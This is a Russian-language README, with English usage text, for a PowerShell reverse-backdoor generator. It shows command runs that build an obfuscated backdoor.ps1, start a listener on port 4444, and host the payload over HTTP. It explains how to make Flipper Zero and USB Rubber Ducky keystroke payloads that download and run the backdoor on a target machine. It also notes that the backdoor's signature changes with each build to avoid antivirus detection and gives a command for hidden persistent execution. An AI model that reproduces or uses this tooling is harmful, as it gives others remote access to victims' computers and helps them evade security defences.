
Обратный бэкдор, написанный на PowerShell и обфусцированный с помощью Python. Он генерирует полезные нагрузки для популярных хакерских устройств, таких как Flipper Zero и Hak5 USB Rubber Ducky, и изменяет свою сигнатуру после каждой сборки, чтобы избежать обнаружения антивирусами.
/******************************************************************************
Инструмент для обратного бэкдора, написанный на PowerShell и обфусцированный с помощью Python, обеспечивающий новую сигнатуру после каждой сборки для обхода обнаружения. Инструмент позволяет создавать полезные нагрузки для популярных хакерских устройств, таких как Flipper Zero и Hak5 USB Rubber Ducky. Используйте этот инструмент для проверки защиты вашей системы от продвинутых техник атак.
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
В текущей рабочей директории будет создан файл с именем backdoor.ps1.
Протестировано на Windows 11, Windows 10 и Kali Linux. Чтобы запустить его в скрытом окне с сохранением постоянного доступа, следуйте инструкции
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
При использовании любой из этих атак будет открыт HTTP-сервер, хостящий бэкдор. После загрузки бэкдора HTTP-сервер будет остановлен.
Ниже будет сгенерирован файл с именем powershell_backdoor.txt, который при активации на Flipper загрузит бэкдор с вашего компьютера по HTTP и выполнит его.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Поместите указанный текстовый файл (например, powershell_backdoor.txt) в ваш Flipper Zero. При выполнении полезной нагрузки будет загружен и выполнен файл backdoor.ps1.
Ниже приведена инструкция по созданию файла inject.bin для Hak5 USB Rubber Ducky.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Файл с именем inject.bin будет помещён в вашу текущую рабочую директорию. Для этой функции требуется Java. При выполнении полезной нагрузки будет загружен и выполнен файл backdoor.ps1.
Для кодирования payload.txt в inject.bin для атак USB Rubber Ducky я использую encoder.jar, созданный .
Ниже приведён sha1-хеш файла backdoor.ps1 после 5 сборок.
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49